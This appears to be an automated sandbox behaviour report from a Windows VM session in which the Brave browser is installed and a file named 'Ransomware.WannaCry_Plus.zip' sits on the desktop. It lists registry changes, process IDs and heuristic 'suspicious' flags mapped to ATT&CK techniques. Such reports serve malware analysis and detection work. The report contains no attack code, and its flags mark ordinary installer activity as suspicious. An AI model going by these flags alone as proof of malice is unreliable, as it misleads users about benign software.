Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdateOnDemand.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveCrashHandler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveBrowserSetup-BRV002.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1344	BraveUpdate.exe
4164	cmd.exe
5500	PING.EXE
4428	BraveUpdate.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
352	WMIC.exe
5676	WMIC.exe
4772	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	brave.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	brave.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	brave.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	brave.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	brave.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	brave.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4564	systeminfo.exe

Kills process with taskkill 17 IoCs

evasion

pid	Process
1308	taskkill.exe
5680	taskkill.exe
2104	taskkill.exe
5552	taskkill.exe
3140	taskkill.exe
4064	taskkill.exe
5836	taskkill.exe
808	taskkill.exe
4360	taskkill.exe
4124	taskkill.exe
5540	taskkill.exe
5504	taskkill.exe
5628	taskkill.exe
800	taskkill.exe
3204	taskkill.exe
6124	taskkill.exe
4424	taskkill.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133806505330008957"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	brave.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	brave.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.PolicyStatusMachine\CurVer	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.PolicyStatusMachineFallback.1.0\ = "Google Update Policy Status Class"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5D1924F-CB80-47AA-8DEC-5E0854A42A73}\LocalServer32\ = "\"C:\\Program Files (x86)\\BraveSoftware\\Update\\1.3.361.151\\BraveUpdateOnDemand.exe\""	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BravePDF\shell\open\command\ = "\"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe\" --single-argument %1"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	brave.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.Update3WebSvc\CurVer\ = "BraveSoftwareUpdate.Update3WebSvc.1.0"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7A24060E-533F-4962-9E15-34BD82555FA7}\NumMethods\ = "10"	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A147722A-5568-4B84-B401-86D744470CBF}\ProxyStubClsid32\ = "{6B042DC7-1633-49A2-8255-7DA828C32CA7}"	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4842EC21-0860-45B5-99F0-A1E6E7C11561}\ProxyStubClsid32	BraveUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FB43AAD0-DDBA-4D01-A3E0-FAB100E7926B}\NumMethods	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4C929BFE-4FA4-488D-B1E2-82ECD6F076C8}\ = "IGoogleUpdate"	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{F396861E-0C8E-4C71-8256-2FAE6D759CE9}\1.0	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings	brave.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4842EC21-0860-45B5-99F0-A1E6E7C11561}\NumMethods\ = "11"	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{48B5E6B2-9383-4B1E-AAE7-720C4779ABA6}\ProxyStubClsid32	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6836CFF-5949-44BC-B6BE-9C8C48DD8D97}	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B042DC7-1633-49A2-8255-7DA828C32CA7}\ = "PSFactoryBuffer"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7A24060E-533F-4962-9E15-34BD82555FA7}\NumMethods\ = "10"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7CB305B1-4D45-4668-AD91-677F87BED305}\ProxyStubClsid32\ = "{6B042DC7-1633-49A2-8255-7DA828C32CA7}"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{660130E8-74E4-4821-A6FD-4E9A86E06470}\ = "ICredentialDialog"	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{70E5ECF5-2CA7-4019-9B23-916789A13C2C}\ProxyStubClsid32	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.Update3WebMachine.1.0\CLSID	BraveUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.Update3WebMachineFallback	BraveUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3AD2D487-D166-4160-8E36-1AE505233A55}\ProgID	BraveUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0D2DC5A9-E726-4D6B-BD5E-648F4BDA4930}	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4C929BFE-4FA4-488D-B1E2-82ECD6F076C8}\ProxyStubClsid32	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19F4616B-B7DD-4B3F-8084-C81C5C77AAA4}\ProxyStubClsid32	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C974F2DD-CFB8-4466-8E6D-96ED901DAACA}\ = "IPolicyStatus3"	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00B16F95-319A-4F01-AC81-CE69B8F4E387}\ = "Google Update Broker Class Factory"	BraveUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F234546B-DACD-4374-97CF-7BADFAB76766}\ProxyStubClsid32	BraveUpdateComRegisterShell64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	brave.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F234546B-DACD-4374-97CF-7BADFAB76766}	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.CoCreateAsync\CurVer\ = "BraveSoftwareUpdate.CoCreateAsync.1.0"	BraveUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C663DEBB-F082-4971-9F6E-35DE45C96F4E}	BraveUpdateComRegisterShell64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	brave.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.PolicyStatusSvc\ = "Google Update Policy Status Class"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3AD2D487-D166-4160-8E36-1AE505233A55}\ProgID\ = "BraveSoftwareUpdate.CoreClass.1"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F234546B-DACD-4374-97CF-7BADFAB76766}\ = "IAppVersion"	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B042DC7-1633-49A2-8255-7DA828C32CA7}\InProcServer32\ThreadingModel = "Both"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EFF9CA12-4CD3-474B-B881-CDE1D92F1996}\ProxyStubClsid32\ = "{6B042DC7-1633-49A2-8255-7DA828C32CA7}"	BraveUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC03C0E4-1528-4299-89B2-419644FA48AC}\InprocServer32	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EFF9CA12-4CD3-474B-B881-CDE1D92F1996}\NumMethods\ = "23"	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.CredentialDialogMachine\CurVer\ = "BraveSoftwareUpdate.CredentialDialogMachine.1.0"	BraveUpdate.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	brave.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	brave.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	brave.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7CFC4E00-1C9D-443D-B5BE-CEEEAC1443AF}\NumMethods	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B042DC7-1633-49A2-8255-7DA828C32CA7}	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveFile\AppUserModelId = "Brave"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithProgids	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings	brave.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	brave.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C663DEBB-F082-4971-9F6E-35DE45C96F4E}\ProxyStubClsid32	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.CoreClass\ = "Google Update Core Class"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A4BCDF52-2179-4C77-8C5F-B8095712B563}\ProxyStubClsid32\ = "{6B042DC7-1633-49A2-8255-7DA828C32CA7}"	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66CE3D6C-0B35-4F78-AC77-39728A75CB75}\ProgID\ = "BraveSoftwareUpdate.Update3WebMachineFallback.1.0"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{08F15E98-0442-45D3-82F1-F67495CC51EB}\ServiceParameters = "/comsvc"	BraveUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD84E356-3D21-44C8-83DD-6BEEC22FA427}\ProxyStubClsid32	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7A24060E-533F-4962-9E15-34BD82555FA7}\NumMethods\ = "10"	BraveUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9190589-ECEC-43F8-8AEC-62496BB87B26}\ProxyStubClsid32\ = "{6B042DC7-1633-49A2-8255-7DA828C32CA7}"	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.Update3WebMachineFallback\CurVer	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BraveSoftwareUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{28C83F57-E4C0-4B54-B187-585C51EE8F9C}"	BraveUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C663DEBB-F082-4971-9F6E-35DE45C96F4E}\ProxyStubClsid32\ = "{6B042DC7-1633-49A2-8255-7DA828C32CA7}"	BraveUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6836CFF-5949-44BC-B6BE-9C8C48DD8D97}\NumMethods	BraveUpdateComRegisterShell64.exe

NTFS ADS 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\BraveBrowserSetup-BRV002.exe:Zone.Identifier	chrome.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\BraveUpdateSetup.exe\:Zone.Identifier:$DATA	BraveBrowserSetup-BRV002.exe
File opened for modification	C:\Users\Admin\Downloads\1d973d05dee26f74ae352325da741928af4327f7a6be27cdec085a31fbea8100:Zone.Identifier	brave.exe
File opened for modification	C:\Users\Admin\Desktop\0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494:Zone.Identifier	brave.exe
File opened for modification	C:\Users\Admin\Desktop\Ransomware.WannaCry_Plus.zip:Zone.Identifier	brave.exe
File opened for modification	C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.zip:Zone.Identifier	brave.exe
File opened for modification	C:\Users\Admin\Desktop\7z2409-x64.exe:Zone.Identifier	brave.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5500	PING.EXE

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
2340	chrome.exe
2340	chrome.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3512	BraveUpdate.exe
3512	BraveUpdate.exe
1344	BraveUpdate.exe
1344	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
3504	BraveUpdate.exe
4276	brave.exe
4276	brave.exe
6060	brave.exe
6060	brave.exe
5584	BraveUpdate.exe
5584	BraveUpdate.exe
5568	BraveUpdate.exe
5568	BraveUpdate.exe
1148	BraveUpdate.exe
1148	BraveUpdate.exe
2932	powershell.exe
2932	powershell.exe
1096	powershell.exe
1096	powershell.exe
1096	powershell.exe
2932	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
4320	powershell.exe
4320	powershell.exe
2648	powershell.exe
2648	powershell.exe
2648	powershell.exe
4320	powershell.exe
868	powershell.exe
868	powershell.exe
956	powershell.exe
956	powershell.exe
5016	powershell.exe
5016	powershell.exe
5280	powershell.exe
5280	powershell.exe
3284	brave.exe
3284	brave.exe
3284	brave.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1180	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

pid	Process
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
3284	brave.exe
3284	brave.exe
3284	brave.exe
3284	brave.exe
3284	brave.exe
3284	brave.exe
3284	brave.exe
3284	brave.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe
Token: SeShutdownPrivilege	2340	chrome.exe
Token: SeCreatePagefilePrivilege	2340	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
2780	chrmstp.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe
4276	brave.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
4596	brave.exe
3412	brave.exe
5308	brave.exe
5400	brave.exe
5652	brave.exe
5780	brave.exe
5860	brave.exe
1964	brave.exe
3196	brave.exe
5972	brave.exe
1496	brave.exe
1256	brave.exe
5960	brave.exe
1724	7z2409-x64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 224	2340	chrome.exe	77
PID 2340 wrote to memory of 224	2340	chrome.exe	77
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 924	2340	chrome.exe	78
PID 2340 wrote to memory of 4800	2340	chrome.exe	79
PID 2340 wrote to memory of 4800	2340	chrome.exe	79
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80
PID 2340 wrote to memory of 488	2340	chrome.exe	80

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6032	attrib.exe
5564	attrib.exe
5764	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://idk.com
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Program Files\Google\Chrome\Application\chrome.exe
